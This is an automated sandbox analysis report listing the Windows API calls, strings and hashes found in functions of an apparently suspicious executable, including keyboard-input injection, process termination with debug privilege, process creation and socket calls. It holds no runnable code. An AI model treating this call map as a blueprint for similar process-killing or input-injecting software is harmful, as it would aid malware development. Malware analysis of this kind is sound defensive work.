                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 29da83d3702020537df9a7555863aeb0f7092b66ad552d033f38373516a81f15
                    • Instruction ID: 1571bfc8dee5bedfa91f992124e5afb9d3ef87637551670518251c44f53cd814
                    • Opcode Fuzzy Hash: 29da83d3702020537df9a7555863aeb0f7092b66ad552d033f38373516a81f15
                    • Instruction Fuzzy Hash: 8171E531400205DFCF21EF64CC85AFA3BB5FF49311F14826AEE555A2A6D7398C56DB60
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                      • Part of subcall function 00752344: GetCursorPos.USER32(?), ref: 00752357
                      • Part of subcall function 00752344: ScreenToClient.USER32(008167B0,?), ref: 00752374
                      • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000001), ref: 00752399
                      • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000002), ref: 007523A7
                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 007DC2E4
                    • ImageList_EndDrag.COMCTL32 ref: 007DC2EA
                    • ReleaseCapture.USER32 ref: 007DC2F0
                    • SetWindowTextW.USER32(?,00000000), ref: 007DC39A
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007DC3AD
                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 007DC48F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    • API String ID: 1924731296-2107944366
                    • Opcode ID: b3bcd4eca16258f17c471f695982db34665047941ebec36d680e85d58dbd9d85
                    • Instruction ID: bc204e2f7c600eb746b2fcc0e283aa104ea09ca696208547b2ff7b5943c55a5e
                    • Opcode Fuzzy Hash: b3bcd4eca16258f17c471f695982db34665047941ebec36d680e85d58dbd9d85
                    • Instruction Fuzzy Hash: DE517B70204205EFD700DF24C85ABAA7BF5FF88311F04852AF996872E1DB79A959CB52
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007DF910), ref: 007C903D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007DF910), ref: 007C9071
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007C91EB
                    • SysFreeString.OLEAUT32(?), ref: 007C9215
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: 9d28715d209556877ffb8717301ca7b5cdcae70afdfec746eff318d7865728ce
                    • Instruction ID: 7651111cc01aac059f46ec118eb4313b66be631b3fe3e69b9a4aa68ef64af868
                    • Opcode Fuzzy Hash: 9d28715d209556877ffb8717301ca7b5cdcae70afdfec746eff318d7865728ce
                    • Instruction Fuzzy Hash: 6BF12871A00209EFDB44DF94C888EAEB7B9FF49315F14805DFA16AB250DB35AE46CB50
                    APIs
                    • _memset.LIBCMT ref: 007CF9C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CFB5C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CFB80
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CFBC0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CFBE2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007CFD5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007CFD90
                    • CloseHandle.KERNEL32(?), ref: 007CFDBF
                    • CloseHandle.KERNEL32(?), ref: 007CFE36
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: fa0ebd2c841ed297996705e20bcf8743814deededa329c81a89e7278cf45bd5e
                    • Instruction ID: 95a25f251243c343316f0930913ed12e52de14568e8fc66f86df4eb18c0ff3f7
                    • Opcode Fuzzy Hash: fa0ebd2c841ed297996705e20bcf8743814deededa329c81a89e7278cf45bd5e
                    • Instruction Fuzzy Hash: ACE1C331204301DFCB14EF24C895F6ABBE1AF85354F14856DF89A8B2A2DB79EC45CB52
                    APIs
                      • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007B38D3,?), ref: 007B48C7
                      • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007B38D3,?), ref: 007B48E0
                      • Part of subcall function 007B4CD3: GetFileAttributesW.KERNEL32(?,007B3947), ref: 007B4CD4
                    • lstrcmpiW.KERNEL32(?,?), ref: 007B4FE2
                    • _wcscmp.LIBCMT ref: 007B4FFC
                    • MoveFileW.KERNEL32(?,?), ref: 007B5017
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: c9dbd2f23901a351d3c61536881376b0c8df8cf679bd0b2c8a523042816fae70
                    • Instruction ID: 59f7ccedfc79cf3987b540e47bb295b43ee488943b2f0976cf2a45c4635e5592
                    • Opcode Fuzzy Hash: c9dbd2f23901a351d3c61536881376b0c8df8cf679bd0b2c8a523042816fae70
                    • Instruction Fuzzy Hash: 365186B24087849BC724EB64D885ADFB7ECAF84341F00492EF589D7152EF78A18D8766
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007D896E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 6d75aebe451c45b75a7826016816c310e3ef4f8faaba0b6c0df8d619bc9ffc7f
                    • Instruction ID: 92a0f989e55326e50c507e5eaa4cc6d51efd2456992d4328eff861f4339a175a
                    • Opcode Fuzzy Hash: 6d75aebe451c45b75a7826016816c310e3ef4f8faaba0b6c0df8d619bc9ffc7f
                    • Instruction Fuzzy Hash: 6F51A230600204FFDB609F28CC89BA93B75FB45320F648113F956E63A1DF79A9909B92
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0078C547
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0078C569
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0078C581
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0078C59F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0078C5C0
                    • DestroyIcon.USER32(00000000), ref: 0078C5CF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0078C5EC
                    • DestroyIcon.USER32(?), ref: 0078C5FB
                      • Part of subcall function 007DA71E: DeleteObject.GDI32(00000000), ref: 007DA757
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2819616528-0
                    • Opcode ID: c402be2cf640f29418db656cfb6ba073267f6d503c676decb311343f6ebf3b86
                    • Instruction ID: 0ffc50ec059b8fc528871883727acca7bb0fd7260c2008899f02ed5f166c34b4
                    • Opcode Fuzzy Hash: c402be2cf640f29418db656cfb6ba073267f6d503c676decb311343f6ebf3b86
                    • Instruction Fuzzy Hash: 71517AB0640209EFDB24DF24CC45FAA3BB5FB45311F104529F942A72A1EBB8ED95DB60
                    APIs
                      • Part of subcall function 007AAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AAE77
                      • Part of subcall function 007AAE57: GetCurrentThreadId.KERNEL32 ref: 007AAE7E
                      • Part of subcall function 007AAE57: AttachThreadInput.USER32(00000000,?,007A9B65,?,00000001), ref: 007AAE85
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9B70
                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007A9B8D
                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007A9B90
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9B99
                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007A9BB7
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007A9BBA
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9BC3
                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007A9BDA
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007A9BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                    • String ID:
                    • API String ID: 2014098862-0
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007A8A84,00000B00,?,?), ref: 007A8E0C
                    • HeapAlloc.KERNEL32(00000000,?,007A8A84,00000B00,?,?), ref: 007A8E13
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007A8A84,00000B00,?,?), ref: 007A8E28
                    • GetCurrentProcess.KERNEL32(?,00000000,?,007A8A84,00000B00,?,?), ref: 007A8E30
                    • DuplicateHandle.KERNEL32(00000000,?,007A8A84,00000B00,?,?), ref: 007A8E33
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007A8A84,00000B00,?,?), ref: 007A8E43
                    • GetCurrentProcess.KERNEL32(007A8A84,00000000,?,007A8A84,00000B00,?,?), ref: 007A8E4B
                    • DuplicateHandle.KERNEL32(00000000,?,007A8A84,00000B00,?,?), ref: 007A8E4E
                    • CreateThread.KERNEL32(00000000,00000000,007A8E74,00000000,00000000,00000000), ref: 007A8E68
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    • String ID:
                    • API String ID: 1957940570-0
                    APIs
                      • Part of subcall function 007A7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?,?,007A799D), ref: 007A766F
                      • Part of subcall function 007A7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A768A
                      • Part of subcall function 007A7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A7698
                      • Part of subcall function 007A7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?), ref: 007A76A8
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007C9B1B
                    • _memset.LIBCMT ref: 007C9B28
                    • _memset.LIBCMT ref: 007C9C6B
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007C9C97
                    • CoTaskMemFree.OLE32(?), ref: 007C9CA2
                    Strings
                    • NULL Pointer assignment, xrefs: 007C9CF0
                    Similarity
                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1300414916-2785691316
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007D7093
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 007D70A7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007D70C1
                    • _wcscat.LIBCMT ref: 007D711C
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 007D7133
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007D7161
                    Strings
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    APIs
                      • Part of subcall function 007B3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 007B3EB6
                      • Part of subcall function 007B3E91: Process32FirstW.KERNEL32(00000000,?), ref: 007B3EC4
                      • Part of subcall function 007B3E91: CloseHandle.KERNEL32(00000000), ref: 007B3F8E
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CECB8
                    • GetLastError.KERNEL32 ref: 007CECCB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CECFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 007CED77
                    • GetLastError.KERNEL32(00000000), ref: 007CED82
                    • CloseHandle.KERNEL32(00000000), ref: 007CEDB7
                    Strings
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 007B32C5
                    Strings
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007B454E
                    • LoadStringW.USER32(00000000), ref: 007B4555
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007B456B
                    • LoadStringW.USER32(00000000), ref: 007B4572
                    • _wprintf.LIBCMT ref: 007B4598
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007B45B6
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 007B4593
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • GetSystemMetrics.USER32(0000000F), ref: 007DD78A
                    • GetSystemMetrics.USER32(0000000F), ref: 007DD7AA
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007DD9E5
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007DDA03
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007DDA24
                    • ShowWindow.USER32(00000003,00000000), ref: 007DDA43
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007DDA68
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 007DDA8B
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    • String ID:
                    • API String ID: 1211466189-0
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000), ref: 00752ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000,000000FF), ref: 00752B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000), ref: 0078C46A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000), ref: 0078C4D6
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 007B737F
                      • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                      • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007B73B6
                    • EnterCriticalSection.KERNEL32(?), ref: 007B73D2
                    • _memmove.LIBCMT ref: 007B7420
                    • _memmove.LIBCMT ref: 007B743D
                    • LeaveCriticalSection.KERNEL32(?), ref: 007B744C
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007B7461
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 007B7480
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 007D645A
                    • GetDC.USER32(00000000), ref: 007D6462
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007D646D
                    • ReleaseDC.USER32(00000000,00000000), ref: 007D6479
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007D64B5
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007D64C6
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007D9299,?,?,000000FF,00000000,?,000000FF,?), ref: 007D6500
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007D6520
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    APIs
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    APIs
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                      • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                    • _wcstok.LIBCMT ref: 007BEEFF
                    • _wcscpy.LIBCMT ref: 007BEF8E
                    • _memset.LIBCMT ref: 007BEFC1
                    Strings
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    APIs
                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 007C6F14
                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007C6F35
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C6F48
                    • htons.WSOCK32(?,?,?,00000000,?), ref: 007C6FFE
                    • inet_ntoa.WSOCK32(?), ref: 007C6FBB
                      • Part of subcall function 007AAE14: _strlen.LIBCMT ref: 007AAE1E
                      • Part of subcall function 007AAE14: _memmove.LIBCMT ref: 007AAE40
                    • _strlen.LIBCMT ref: 007C7058
                    • _memmove.LIBCMT ref: 007C70C1
                    Similarity
                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                    • String ID:
                    • API String ID: 3619996494-0
                    APIs
                    • IsWindow.USER32(011E53C0), ref: 007DB6A5
                    • IsWindowEnabled.USER32(011E53C0), ref: 007DB6B1
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007DB795
                    • SendMessageW.USER32(011E53C0,000000B0,?,?), ref: 007DB7CC
                    • IsDlgButtonChecked.USER32(?,?), ref: 007DB809
                    • GetWindowLongW.USER32(011E53C0,000000EC), ref: 007DB82B
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007DB843
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    • Opcode ID: 93ac5ede1f88da1239b66cc48851c85bb79af636e48db82554fcd5bfe63860a7
                    • Instruction ID: e3dce9c4ed1d254544f0a7d8d56a155d4f811b02405ac5bbeea7368737c5a25b
                    • Opcode Fuzzy Hash: 93ac5ede1f88da1239b66cc48851c85bb79af636e48db82554fcd5bfe63860a7
                    • Instruction Fuzzy Hash: 1F718B34601204EFDB219F64C894FBA7BB9FF49310F1A446BE986973A1C739E851CB54
                    APIs
                    • _memset.LIBCMT ref: 007CF75C
                    • _memset.LIBCMT ref: 007CF825
                    • ShellExecuteExW.SHELL32(?), ref: 007CF86A
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                      • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                    • GetProcessId.KERNEL32(00000000), ref: 007CF8E1
                    • CloseHandle.KERNEL32(00000000), ref: 007CF910
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    • Opcode ID: a2c01c1709806ecd8bbd11ba4cbe5dc1db9516cf77f51e2dfed1701f8491a726
                    • Instruction ID: 85e6c23cc82a7fcb866cb95b9c3ff9431b4f96f52857aa0b1fa4b3926a90d6b5
                    • Opcode Fuzzy Hash: a2c01c1709806ecd8bbd11ba4cbe5dc1db9516cf77f51e2dfed1701f8491a726
                    • Instruction Fuzzy Hash: 75619C75A00619DFCF14EF64C484AAEBBF6FF48310B14846DE85AAB351CB79AD44CB90
                    APIs
                    • GetParent.USER32(?), ref: 007B149C
                    • GetKeyboardState.USER32(?), ref: 007B14B1
                    • SetKeyboardState.USER32(?), ref: 007B1512
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 007B1540
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 007B155F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 007B15A5
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007B15C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: 4362735814fc2240f4c67b52c8a6f3840796f7b89b0e8e781370e469bb630c22
                    • Instruction ID: 5b77b59477580115de716d562704770bd8734c80b02b3b3333d2c7641269c389
                    • Opcode Fuzzy Hash: 4362735814fc2240f4c67b52c8a6f3840796f7b89b0e8e781370e469bb630c22
                    • Instruction Fuzzy Hash: 5151E2A0A047D53EFB3642348C69BFA7FA95F46304F8C8589E1D6468C2C69CEC94D750
                    APIs
                    • GetParent.USER32(00000000), ref: 007B12B5
                    • GetKeyboardState.USER32(?), ref: 007B12CA
                    • SetKeyboardState.USER32(?), ref: 007B132B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007B1357
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007B1374
